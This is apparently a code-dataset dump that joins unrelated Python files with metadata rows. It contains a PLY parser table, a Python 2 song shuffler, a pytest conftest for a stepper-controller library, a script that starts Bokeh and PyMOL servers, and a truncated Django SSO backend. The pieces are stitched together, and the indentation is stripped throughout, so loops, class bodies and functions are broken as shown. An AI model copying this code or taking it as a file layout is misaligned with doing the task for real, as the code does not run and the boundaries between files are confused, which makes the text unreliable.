,-61,51,-64,-65,-15,-38,-50,-49,51,-48,51,27,109,109,-72,51,-54,-57,-58,-60,-62,27,-40,27,-67,27,-76,27,-3,-12,-3,-21,-14,-19,-23,51,27,-22,27,-3,-20,]),'MAC':([0,2,7,9,10,11,12,16,36,37,78,92,106,112,123,137,141,142,148,149,150,152,154,155,156,158,160,164,165,167,168,],[29,29,-6,-8,-9,-11,-13,29,-5,-7,-4,-15,29,-72,29,29,-67,29,29,-3,-12,-3,-21,-14,-19,-23,29,-22,29,-3,-20,]),'ATOM':([0,2,5,7,9,10,11,12,16,18,19,20,21,22,24,26,28,29,30,36,37,50,51,70,71,73,77,78,80,81,82,83,86,88,90,91,92,96,97,100,104,106,107,109,112,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,160,164,165,167,168,],[30,30,-32,-6,-8,-9,-11,-13,30,-31,-33,-34,-35,-36,-39,-55,-63,70,71,-5,-7,-37,-56,107,71,71,-66,-4,-44,-45,-46,-47,-59,-61,-64,-65,-15,-38,-50,-49,-48,30,107,107,-72,-54,-57,-58,-60,-62,30,-40,30,-67,30,-76,30,-3,-12,-3,-21,-14,-19,-23,30,-22,30,-3,-20,]),'WHILE':([0,2,7,9,10,11,12,16,36,37,78,92,106,112,123,137,141,142,148,149,150,152,154,155,156,158,160,164,165,167,168,],[31,31,-6,-8,-9,-11,-13,31,-5,-7,-4,-15,31,-72,31,31,-67,31,31,-3,-12,-3,-21,-14,-19,-23,31,-22,31,-3,-20,]),'FUN':([0,2,7,9,10,11,12,16,36,37,78,92,106,112,123,137,141,142,148,149,150,152,154,155,156,158,160,164,165,167,168,],[32,32,-6,-8,-9,-11,-13,32,-5,-7,-4,-15,32,-72,32,32,-67,32,32,-3,-12,-3,-21,-14,-19,-23,32,-22,32,-3,-20,]),'NOT':([0,2,5,7,9,10,11,12,13,16,18,19,20,21,22,24,25,26,28,30,33,36,37,38,39,40,41,42,45,46,47,48,50,51,52,53,63,64,71,73,75,77,78,80,81,82,83,84,85,86,87,88,89,90,91,92,96,97,100,101,104,105,106,112,114,117,118,119,120,121,123,128,137,141,142,145,148,149,150,152,154,155,156,158,159,160,164,165,167,168,],[33,33,-32,-6,-8,-9,-11,-13,33,33,-31,-33,-34,-35,-36,-39,33,-55,-63,33,33,-5,-7,33,33,33,33,33,33,33,33,33,-37,-56,33,33,33,33,33,33,33,-66,-4,-44,-45,-46,-47,33,33,-59,33,-61,33,-64,-65,-15,-38,-50,-49,33,-48,33,33,-72,33,-54,-57,-58,-60,-62,33,-40,33,-67,33,-76,33,-3,-12,-3,-21,-14,-19,-23,33,33,-22,33,-3,-20,]),'RPAREN':([2,3,5,7,9,10,11,12,16,18,19,20,21,22,24,26,27,28,34,36,37,50,51,54,55,56,57,58,63,66,67,77,78,80,81,82,83,86,88,90,91,92,95,96,97,99,100,102,104,105,112,115,116,117,118,119,120,121,124,125,126,128,130,136,141,145,149,150,152,154,155,156,158,161,164,167,168,],[-3,-2,-32,-6,-8,-9,-11,-13,-3,-31,-33,-34,-35,-36,-39,-55,-56,-63,-1,-5,-7,-37,-56,96,97,98,-16,-2,-3,-41,-42,-66,-4,-44,-45,-46,-47,-59,-61,-64,-65,-15,122,-38,-50,-3,-49,128,-48,-3,-72,135,-3,-54,-57,-58,-60,-62,-16,-17,-18,-40,-43,143,-67,-76,-3,-12,-3,-21,-14,-19,-23,163,-22,-3,-20,]),'RBRACE':([2,3,5,7,9,10,11,12,17,18,19,20,21,22,24,26,28,34,36,37,50,51,59,61,77,78,80,81,82,83,86,88,90,91,92,96,97,100,104,106,112,117,118,119,120,121,123,127,128,131,137,138,139,141,142,144,145,146,147,148,149,150,151,152,154,155,156,158,160,162,164,165,166,167,168,],[-3,-2,-32,-6,-8,-9,-11,-13,-3,-31,-33,-34,-35,-36,-39,-55,-63,-1,-5,-7,-37,-56,100,-53,-66,-4,-44,-45,-46,-47,-59,-61,-64,-65,-15,-38,-50,-49,-48,-3,-72,-54,-57,-58,-60,-62,-3,-51,-40,141,-3,145,-3,-67,-3,149,-76,-52,150,-3,-3,-12,155,-3,-21,-14,-19,-23,-3,164,-22,-3,167,-3,-20,]),'SEMICOLON':([5,6,8,18,19,20,21,22,23,24,26,27,28,30,35,49,50,51,54,57,71,72,73,74,77,80,81,82,83,86,88,90,91,93,94,96,97,100,104,111,113,117,118,119,120,121,128,145,],[-32,36,37,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,-3,78,92,-37,-56,37,-37,-3,112,-3,-75,-66,-44,-45,-46,-47,-59,-61,-64,-65,-10,-24,-38,-50,-49,-48,-73,-74,-54,-57,-58,-60,-62,-40,-76,]),'PLUS':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,39,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,39,-37,-56,39,-37,39,39,39,39,-44,-45,-46,-47,39,39,39,39,39,39,-38,-50,-49,39,-48,39,-54,39,39,39,39,39,-40,39,-76,39,]),'MINUS':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,40,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,40,-37,-56,40,-37,40,40,40,40,-44,-45,-46,-47,40,40,40,40,40,40,-38,-50,-49,40,-48,40,-54,40,40,40,40,40,-40,40,-76,40,]),'MULTIPLY':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,41,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,41,-37,-56,41,-37,41,41,41,41,41,41,-46,-47,41,41,41,41,41,41,-38,-50,-49,41,-48,41,-54,41,41,41,41,41,-40,41,-76,41,]),'DIVIDE':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,42,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,42,-37,-56,42,-37,42,42,42,42,42,42,-46,-47,42,42,42,42,42,42,-38,-50,-49,42,-48,42,-54,42,42,42,42,42,-40,42,-76,42,]),'EQUAL':([5,8,14,18,19,20,21,22,23,24,26,27,28,43,44,45,46,49,50,51,54,57,62,67,68,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,129,134,140,145,161,],[-32,43,52,-31,-33,-34,-35,-36,-25,-39,-55,-27,-63,84,85,87,89,43,-37,-56,43,-25,-26,43,-28,43,43,43,-44,-45,-46,-47,43,43,43,43,43,43,-38,-50,-49,43,-48,43,-54,43,43,43,43,43,-40,-29,43,-30,-76,43,]),'BANG':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,44,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,44,-37,-56,44,-37,44,44,44,44,-44,-45,-46,-47,44,44,44,44,44,44,-38,-50,-49,44,-48,44,-54,44,44,44,44,44,-40,44,-76,44,]),'GT':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,45,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,45,-37,-56,45,-37,45,45,45,45,-44,-45,-46,-47,45,45,45,45,45,45,-38,-50,-49,45,-48,45,-54,45,45,45,45,45,-40,45,-76,45,]),'LT':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,46,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,46,-37,-56,46,-37,46,46,46,46,-44,-45,-46,-47,46,46,46,46,46,46,-38,-50,-49,46,-48,46,-54,46,46,46,46,46,-40,46,-76,46,]),'AND':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,47,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,47,-37,-56,47,-37,47,47,47,47,-44,-45,-46,-47,47,47,47,47,47,47,-38,-50,-49,47,-48,47,-54,47,47,47,47,47,-40,47,-76,47,]),'OR':([5,8,18,19,20,21,22,23,24,26,27,28,49,50,51,54,57,67,73,77,79,80,81,82,83,86,88,90,91,94,95,96,97,100,103,104,115,117,118,119,120,121,127,128,134,145,161,],[-32,48,-31,-33,-34,-35,-36,-37,-39,-55,-56,-63,48,-37,-56,48,-37,48,48,48,48,-44,-45,-46,-47,48,48,48,48,48,48,-38,-50,-49,48,-48,48,-54,48,48,48,48,48,-40,48,-76,48,]),'COMMA':([5,18,19,20,21,22,24,26,28,50,51,57,67,77,80,81,82,83,86,88,90,91,96,97,100,104,117,118,119,120,121,124,127,128,134,145,],[-32,-31,-33,-34,-35,-36,-39,-55,-63,-37,-56,99,105,-66,-44,-45,-46,-47,-59,-61,-64,-65,-38,-50,-49,-48,-54,-57,-58,-60,-62,99,139,-40,105,-76,]),'RBRACKET':([5,18,19,20,21,22,24,25,26,28,50,51,65,66,67,77,79,80,81,82,83,86,88,90,91,96,97,100,103,104,105,114,117,118,119,120,121,128,130,134,145,],[-32,-31,-33,-34,-35,-36,-39,-3,-55,-63,-37,-56,104,-41,-42,-66,117,-44,-45,-46,-47,-59,-61,-64,-65,-38,-50,-49,129,-48,-3,-3,-54,-57,-58,-60,-62,-40,-43,117,-76,]),'COLON':([60,],[101,]),'ELIF':([149,167,],[153,153,]),'ELSE':([149,152,154,167,168,],[-3,157,-21,-3,-20,]),}
_lr_action = {}
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = {}
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'statement_list':([0,2,16,106,123,137,142,148,160,165,],[1,34,55,131,138,144,147,151,162,166,]),'statement':([0,2,16,106,123,137,142,148,160,165,],[2,2,2,2,2,2,2,2,2,2,]),'empty':([0,2,16,17,25,30,63,70,71,73,99,105,106,107,109,114,116,123,137,139,142,148,149,152,160,165,167,],[3,3,58,61,66,74,66,110,74,74,126,66,3,110,110,66,126,3,3,61,3,3,154,158,3,3,154,]),'assignment':([0,2,16,106,123,137,142,148,160,165,],[6,6,6,6,6,6,6,6,6,6,]),'conditional':([0,2,16,106,123,137,142,148,160,165,],[7,7,7,7,7,7,7,7,7,7,]),'expr':([0,2,13,16,25,30,33,38,39,40,41,42,45,46,47,48,52,53,63,64,71,73,75,84,85,87,89,101,105,106,114,123,137,142,148,159,160,165,],[8,8,49,54,67,73,77,79,80,81,82,83,86,88,90,91,94,95,67,103,73,73,115,118,119,120,121,127,67,8,134,8,8,8,8,161,8,8,]),'macro_def':([0,2,16,106,123,137,142,148,160,165,],[9,9,9,9,9,9,9,9,9,9,]),'macro_call':([0,2,16,106,123,137,142,148,160,165,],[10,10,10,10,10,10,10,10,10,10,]),'loop':([0,2,16,106,123,137,142,148,160,165,],[11,11,11,11,11,11,11,11,11,11,]),'fun_def':([0,2,16,106,123,137,142,148,160,165,],[12,12,12,12,12,12,12,12,12,12,]),'l_value':([0,2,16,106,123,137,142,148,160,165,],[14,14,14,14,14,14,14,14,14,14,]),'alg_op':([0,2,13,16,25,30,33,38,39,40,41,42,45,46,47,48,52,53,63,64,71,73,75,84,85,87,89,101,105,106,114,123,137,142,148,159,160,165,],[18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,18,]),'func_call':([0,2,13,16,25,30,33,38,39,40,41,42,45,46,47,48,52,53,63,64,71,73,75,84,85,87,89,101,105,106,114,123,137,142,148,159,160,165,],[22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,]),'anonymous_fun':([0,2,13,16,25,30,33,38,39,40,41,42,45,46,47,48,52,53,63,64,71,73,75,84,85,87,89,101,105,106,114,123,137,142,148,159,160,165,],[24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,]),'comp_op':([0,2,13,16,25,30,33,38,39,40,41,42,45,46,47,48,52,53,63,64,71,73,75,84,85,87,89,101,105,106,114,123,137,142,148,159,160,165,],[26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,]),'log_op':([0,2,13,16,25,30,33,38,39,40,41,42,45,46,47,48,52,53,63,64,71,73,75,84,85,87,89,101,105,106,114,123,137,142,148,159,160,165,],[28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,28,]),'id_list':([16,99,116,],[56,125,136,]),'record_list':([17,139,],[59,146,]),'fields':([23,27,57,129,],[62,68,62,140,]),'arg_list':([25,63,105,114,],[65,102,130,65,]),'macro_def_arg_list':([29,],[69,]),'macro_arg_list':([30,71,73,],[72,111,113,]),'r_value':([52,],[93,]),'macro_def_arg_list_rec':([70,107,109,],[108,132,133,]),'conditional_elif':([149,167,],[152,168,]),'conditional_else':([152,],[156,]),}
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
for _x, _y in zip(_v[0], _v[1]):
if not _x in _lr_goto: _lr_goto[_x] = {}
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> statement_list","S'",1,None,None,None),
('statement_list -> statement statement_list','statement_list',2,'p_statement_list','parse.py',20),
('statement_list -> empty','statement_list',1,'p_statement_list','parse.py',21),
('empty -> <empty>','empty',0,'p_empty','parse.py',30),
('statement -> IMPORT STRING SEMICOLON','statement',3,'p_statement_import','parse.py',34),
('statement -> assignment SEMICOLON','statement',2,'p_statement_assignment','parse.py',38),
('statement -> conditional','statement',1,'p_statement_conditional','parse.py',42),
('statement -> expr SEMICOLON','statement',2,'p_statement_expr','parse.py',46),
('statement -> macro_def','statement',1,'p_statement_macro_def','parse.py',50),
('statement -> macro_call','statement',1,'p_statement_macro_call','parse.py',54),
('assignment -> l_value EQUAL r_value','assignment',3,'p_assignment','parse.py',58),
('statement -> loop','statement',1,'p_statement_loop','parse.py',62),
('loop -> WHILE LPAREN expr RPAREN LBRACE statement_list RBRACE','loop',7,'p_loop','parse.py',66),
('statement -> fun_def','statement',1,'p_statement_fun_def','parse.py',70),
('fun_def -> FUN ID LPAREN id_list RPAREN LBRACE statement_list RBRACE','fun_def',8,'p_fun_def','parse.py',74),
('statement -> RETURN expr SEMICOLON','statement',3,'p_statement_return','parse.py',78),
('id_list -> ID','id_list',1,'p_id_list_single','parse.py',82),
('id_list -> ID COMMA id_list','id_list',3,'p_id_list_multi','parse.py',86),
('id_list -> empty','id_list',1,'p_id_list_empty','parse.py',90),
('conditional -> IF LPAREN expr RPAREN LBRACE statement_list RBRACE conditional_elif conditional_else','conditional',9,'p_conditional_full','parse.py',94),
('conditional_elif -> ELIF LPAREN expr RPAREN LBRACE statement_list RBRACE conditional_elif','conditional_elif',8,'p_conditional_elif','parse.py',99),
('conditional_elif -> empty','conditional_elif',1,'p_conditional_elif_empty','parse.py',103),
('conditional_else -> ELSE LBRACE statement_list RBRACE','conditional_else',4,'p_conditional_else','parse.py',107),
('conditional_else -> empty','conditional_else',1,'p_conditional_else_empty','parse.py',111),
('r_value -> expr','r_value',1,'p_r_value','parse.py',115),
('l_value -> ID','l_value',1,'p_l_value_id','parse.py',119),
('l_value -> ID fields','l_value',2,'p_l_value_record','parse.py',123),
('l_value -> PLACEHOLDER','l_value',1,'p_l_value_placeholder','parse.py',127),
('l_value -> PLACEHOLDER fields','l_value',2,'p_l_value_placeholder_record','parse.py',131),
('fields -> LBRACKET expr RBRACKET','fields',3,'p_fields_single','parse.py',134),
('fields -> LBRACKET expr RBRACKET fields','fields',4,'p_fields_multi','parse.py',138),
('expr -> alg_op','expr',1,'p_expr','parse.py',142),
('expr -> STRING','expr',1,'p_expr_string','parse.py',146),
('expr -> NUMBER','expr',1,'p_expr_number','parse.py',150),
('expr -> BOOL','expr',1,'p_expr_bool','parse.py',154),
('expr -> NULL','expr',1,'p_expr_null','parse.py',158),
('expr -> func_call','expr',1,'p_expr_func_call','parse.py',162),
('expr -> ID','expr',1,'p_expr_id','parse.py',166),
('expr -> LPAREN expr RPAREN','expr',3,'p_expr_parens','parse.py',170),
('expr -> anonymous_fun','expr',1,'p_expr_anonymous_fun','parse.py',174),
('func_call -> ID LPAREN arg_list RPAREN','func_call',4,'p_func_call','parse.py',178),
('arg_list -> empty','arg_list',1,'p_arg_list_empty','parse.py',182),
('arg_list -> expr','arg_list',1,'p_arg_list_single','parse.py',186),
('arg_list -> expr COMMA arg_list','arg_list',3,'p_arg_list_multi','parse.py',190),
('alg_op -> expr PLUS expr','alg_op',3,'p_alg_op','parse.py',197),
('alg_op -> expr MINUS expr','alg_op',3,'p_alg_op','parse.py',198),
('alg_op -> expr MULTIPLY expr','alg_op',3,'p_alg_op','parse.py',199),
('alg_op -> expr DIVIDE expr','alg_op',3,'p_alg_op','parse.py',200),
('expr -> LBRACKET arg_list RBRACKET','expr',3,'p_expr_list','parse.py',211),
('expr -> LBRACE record_list RBRACE','expr',3,'p_expr_object','parse.py',215),
('expr -> LPAREN statement_list RPAREN','expr',3,'p_expr_sequence','parse.py',219),
('record_list -> ID COLON expr','record_list',3,'p_record_list_single','parse.py',223),
('record_list -> ID COLON expr COMMA record_list','record_list',5,'p_record_list_multi','parse.py',227),
('record_list -> empty','record_list',1,'p_record_list_empty','parse.py',231),
('expr -> expr LBRACKET expr RBRACKET','expr',4,'p_expr_access','parse.py',235),
('expr -> comp_op','expr',1,'p_expr_comp_op','parse.py',239),
('expr -> PLACEHOLDER','expr',1,'p_expr_placeholder','parse.py',243),
('comp_op -> expr EQUAL EQUAL expr','comp_op',4,'p_comp_op_eq','parse.py',247),
('comp_op -> expr BANG EQUAL expr','comp_op',4,'p_comp_op_neq','parse.py',251),
('comp_op -> expr GT expr','comp_op',3,'p_comp_op_gt','parse.py',255),
('comp_op -> expr GT EQUAL expr','comp_op',4,'p_comp_op_gte','parse.py',259),
('comp_op -> expr LT expr','comp_op',3,'p_comp_op_lt','parse.py',263),
('comp_op -> expr LT EQUAL expr','comp_op',4,'p_comp_op_lte','parse.py',267),
('expr -> log_op','expr',1,'p_expr_log_op','parse.py',271),
('log_op -> expr AND expr','log_op',3,'p_log_op_and','parse.py',275),
('log_op -> expr OR expr','log_op',3,'p_log_op_or','parse.py',279),
('log_op -> NOT expr','log_op',2,'p_log_op_not','parse.py',283),
('macro_def -> MAC macro_def_arg_list LBRACE statement_list RBRACE','macro_def',5,'p_macro_def','parse.py',287),
('macro_def_arg_list -> ATOM macro_def_arg_list_rec','macro_def_arg_list',2,'p_macro_def_arg_list_start_atom','parse.py',291),
('macro_def_arg_list_rec -> PLACEHOLDER macro_def_arg_list_rec','macro_def_arg_list_rec',2,'p_macro_def_arg_list_rec_placeholder','parse.py',295),
('macro_def_arg_list_rec -> ATOM macro_def_arg_list_rec','macro_def_arg_list_rec',2,'p_macro_def_arg_list_rec_atom','parse.py',299),
('macro_def_arg_list_rec -> empty','macro_def_arg_list_rec',1,'p_macro_def_arg_list_rec_empty','parse.py',303),
('macro_call -> ATOM macro_arg_list SEMICOLON','macro_call',3,'p_macro_call_atom_start','parse.py',307),
('macro_arg_list -> ATOM macro_arg_list','macro_arg_list',2,'p_macro_call_arg_list_atom','parse.py',311),
('macro_arg_list -> expr macro_arg_list','macro_arg_list',2,'p_macro_call_arg_list_expr','parse.py',315),
('macro_arg_list -> empty','macro_arg_list',1,'p_macro_call_arg_list_empty','parse.py',319),
('anonymous_fun -> LPAREN id_list RPAREN LBRACE statement_list RBRACE','anonymous_fun',6,'p_anonymous_fun','parse.py',323),
]
| 249.691589 | 14,163 | 0.653966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,629 | 0.322978 |
e2bfcef93fc96b8dc91446c56c75aa9e0e7b89e2 | 5,253 | py | Python | hw12/myscript.py | ranstotz/ece_3822 | 0fad15070f9047a9eccdab9178e4a38cfc148987 | [
"MIT"
] | null | null | null | hw12/myscript.py | ranstotz/ece_3822 | 0fad15070f9047a9eccdab9178e4a38cfc148987 | [
"MIT"
] | null | null | null | hw12/myscript.py | ranstotz/ece_3822 | 0fad15070f9047a9eccdab9178e4a38cfc148987 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# import required modules:
#
import os
import sys
import string
import random
from random import shuffle
from pathlib2 import Path
import linecache
import time
# This class shuffles songs without repeating and keeps track of where
# it left off. See '-help' option for more details.
#
class shuffler:
# define constructor, take arguments as parameters
#
def __init__(self):
self.argv_a = []
# end of constructor
# Method to print arguments from command line provided
#
def printArgs(self):
print "Arguments provided are: ", self.argv_a
return
# Set command line arguments provided, do not include script name
#
def setter(self, commandArgs):
# Set data
#
self.argv_a = commandArgs[1:]
return
# Check for a '-help' option and print help information
#
def check_options(self):
for args in self.argv_a:
if args == '-help':
print "\nsynopsis: This class shuffles the files in the provided command line argument path, then plays each song unrepeated until all songs have been played. Then it will reshuffle the songs and continue the same process.\n"
print "desc: see above.\n"
print "example: provide a path /songs/. Will capture the length of files in that directory and begin the shuffle.\n"
print "options: supports a '-help' option as shown here.\n"
print "arguments: path to files to be shuffled and '-help'.\n"
print "man page: none.\n"
# Exit program if help argument provided
#
sys.exit()
return
# Method to play the shuffler
#
def play(self):
# Get file list from data path in command line argument
#
for root, dir, files in os.walk(self.argv_a[0]):
# store the files from the path as a list in 'mysongs'
#
mysongs = files
# Start an infinite loop
#
while True:
# Check if counter file exists, if not, generate one to hold the counter
# in a scratch file. Also check if the counter has surpassed the number
# of songs
#
my_file = Path("./counter.txt")
if not my_file.is_file() or open("./counter.txt").readline() >= str(len(mysongs)):
# Set counter to 1 for first line in a file
#
songcounter = 1
# Write (or overwrite) song counter to file. Open, write, close the file.
#
counterOut = open("./counter.txt", "w")
counterOut.write(str(songcounter))
counterOut.close()
# Shuffle songs and write (or overwrite them) to a file line by line for each song
#
# Shuffle the list of songs fromt the arguments
#
shuffledList = mysongs
random.shuffle(shuffledList)
shuffleOut = open("./shuffle.txt", "w")
# Write shuffled list into file
#
for i in shuffledList:
shuffleOut.write("%s\n" % i)
# Loop over songs in list
#
for j in range(0, len(mysongs)):
# Get counter for index from file, cast to int, then print counter
#
tempCounter = int(open("./counter.txt").readline())
print tempCounter
# Get random song from the shuffle.txt file according to
# the counter above
#
currentSong = linecache.getline("./shuffle.txt", tempCounter)
# Print the song
#
print currentSong
# Increment counter, overwrite scratch file, and close
#
songcounter = tempCounter
songcounter += 1
counterOut = open("./counter.txt", "w")
counterOut.write(str(songcounter))
counterOut.close()
# Sleep for 1 second as to print 1 song per second
#
time.sleep(1)
# Exit gracefully
return
# main: this is the main function of this Python script
#
def main(argv):
# Create instance of the shuffler class
#
myshuffle = shuffler()
# Set the command line arguments as the input for the class
#
myshuffle.setter(argv)
# Check if the help option is invoked
#
myshuffle.check_options()
# Print the arguments provided to the class from the setter method
#
myshuffle.printArgs()
# Play the shuffler
#
myshuffle.play()
# End gracefully
#
return
# begin gracefully
#
if __name__ == "__main__":
main(sys.argv[0:])
#
# end of file
| 30.540698 | 241 | 0.524843 | 4,304 | 0.819341 | 0 | 0 | 0 | 0 | 0 | 0 | 2,354 | 0.448125 |
e2c30ee2c5287f6ba3a00a3c1a67dd19f25a94b6 | 3,151 | py | Python | tests/conftest.py | RonnyPfannschmidt/python-step-series | 1ecdcac521e951a9c8615ee45bbbb73eae4c6c1f | [
"MIT"
] | null | null | null | tests/conftest.py | RonnyPfannschmidt/python-step-series | 1ecdcac521e951a9c8615ee45bbbb73eae4c6c1f | [
"MIT"
] | null | null | null | tests/conftest.py | RonnyPfannschmidt/python-step-series | 1ecdcac521e951a9c8615ee45bbbb73eae4c6c1f | [
"MIT"
] | null | null | null | """conftest.py for stepseries."""
from threading import Event
from typing import Dict, Tuple
import pytest
from stepseries.responses import DestIP
from stepseries.step400 import STEP400
# store history of failures per test class name and per index in parametrize (if parametrize used)
_test_failed_incremental: Dict[str, Dict[Tuple[int, ...], str]] = {}
def pytest_runtest_makereport(item, call):
if "incremental" in item.keywords:
# incremental marker is used
if call.excinfo is not None and call.excinfo.typename != "Skipped":
# the test has failed
# retrieve the class name of the test
cls_name = str(item.cls)
# retrieve the index of the test
# (if parametrize is used in combination with incremental)
parametrize_index = (
tuple(item.callspec.indices.values())
if hasattr(item, "callspec")
else ()
)
# retrieve the name of the test function
test_name = item.originalname or item.name
# store in _test_failed_incremental the original name of the failed test
_test_failed_incremental.setdefault(cls_name, {}).setdefault(
parametrize_index, test_name
)
def pytest_runtest_setup(item):
if "incremental" in item.keywords:
# retrieve the class name of the test
cls_name = str(item.cls)
# check if a previous test has failed for this class
if cls_name in _test_failed_incremental:
# retrieve the index of the test
# (if parametrize is used in combination with incremental)
parametrize_index = (
tuple(item.callspec.indices.values())
if hasattr(item, "callspec")
else ()
)
# retrieve the name of the first test function to fail for this class name and index
test_name = _test_failed_incremental[cls_name].get(parametrize_index, None)
# if name found, test has failed for the combination of class name & test name
if test_name is not None:
pytest.xfail("previous test failed ({})".format(test_name))
@pytest.mark.incremental
class HardwareIncremental:
pass
_dest_ip_success = Event()
def callback(_: DestIP) -> None:
_dest_ip_success.set()
@pytest.fixture(scope="session")
def device() -> STEP400:
dip_switch_id = 0
local_ip_address = "10.1.21.56"
local_port = 50000
server_ip_address = "0.0.0.0"
server_port = 50100
device = STEP400(
dip_switch_id, local_ip_address, local_port, server_ip_address, server_port
)
device.on(DestIP, callback)
return device
@pytest.fixture
def dest_ip_success() -> Event:
return _dest_ip_success
@pytest.fixture
def device_connected() -> bool:
return _dest_ip_success.is_set()
@pytest.fixture(autouse=True)
def skip_if_disconnected(request, device_connected: bool) -> None:
if request.node.get_closest_marker("skip_disconnected"):
if not device_connected:
pytest.skip("hardware not detected")
| 31.828283 | 98 | 0.653443 | 35 | 0.011108 | 0 | 0 | 817 | 0.259283 | 0 | 0 | 914 | 0.290067 |
e2c3370cf74c6e03caab93b859710a1f281a0702 | 1,334 | py | Python | scripts/run_servers.py | jeeberhardt/visualize | 9ecc01d0b46a7aaa3a6459c567ba770704a71ec4 | [
"MIT"
] | 4 | 2017-11-09T09:24:02.000Z | 2019-06-05T19:44:30.000Z | scripts/run_servers.py | jeeberhardt/visualize | 9ecc01d0b46a7aaa3a6459c567ba770704a71ec4 | [
"MIT"
] | null | null | null | scripts/run_servers.py | jeeberhardt/visualize | 9ecc01d0b46a7aaa3a6459c567ba770704a71ec4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Start Pymol and Bokeh server """
from __future__ import print_function
import time
import shlex
import subprocess
__author__ = "Jérôme Eberhardt"
__copyright__ = "Copyright 2016, Jérôme Eberhardt"
__lience__ = "MIT"
__maintainer__ = "Jérôme Eberhardt"
__email__ = "qksoneo@gmail.com"
def execute_command(cmd_line):
args = shlex.split(cmd_line)
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, errors = p.communicate()
return output, errors
def start_screen_command(cmd, session_name):
cmd_line = "screen -d -m -S %s %s" % (session_name, cmd)
return execute_command(cmd_line)
def stop_screen_command(session_name):
cmd_line = "screen -S %s -X quit" % session_name
return execute_command(cmd_line)
def main():
try:
# Start Bokeh server and PyMOL
start_screen_command("bokeh serve", "visu_bokeh")
start_screen_command("pymol -R", "visu_pymol")
# Dirty hack to be sure Bokeh and Pymol are running...
while True:
time.sleep(3600)
except KeyboardInterrupt:
pass
finally:
# Kill all screen session
stop_screen_command("visu_bokeh")
stop_screen_command("visu_pymol")
if __name__ == "__main__":
main()
| 23.403509 | 78 | 0.678411 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 415 | 0.309701 |
e2c47367897a4e2e747c0d19c8cea05565be28a7 | 6,113 | py | Python | django_sso_app/core/authentication/backends/app.py | paiuolo/django-sso-app | 75b96c669dc0b176dc77e08f018a3e97d259f636 | [
"MIT"
] | 1 | 2021-11-16T15:16:08.000Z | 2021-11-16T15:16:08.000Z | django_sso_app/core/authentication/backends/app.py | paiuolo/django-sso-app | 75b96c669dc0b176dc77e08f018a3e97d259f636 | [
"MIT"
] | null | null | null | django_sso_app/core/authentication/backends/app.py | paiuolo/django-sso-app | 75b96c669dc0b176dc77e08f018a3e97d259f636 | [
"MIT"
] | null | null | null | import logging
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth import get_user_model
from django.contrib.auth.backends import ModelBackend
from ...apps.users.utils import fetch_remote_user, create_local_user_from_remote_backend, \
update_local_user_from_remote_backend, create_local_user_from_jwt, \
create_local_user_from_apigateway_headers
from ...apps.profiles.models import Profile
from ... import app_settings
logger = logging.getLogger('django_sso_app')
User = get_user_model()
class DjangoSsoAppAppBaseAuthenticationBackend(ModelBackend):
def try_replicate_user(self, request, sso_id, encoded_jwt, decoded_jwt):
logger.debug('try_replicate_user')
if app_settings.REPLICATE_PROFILE:
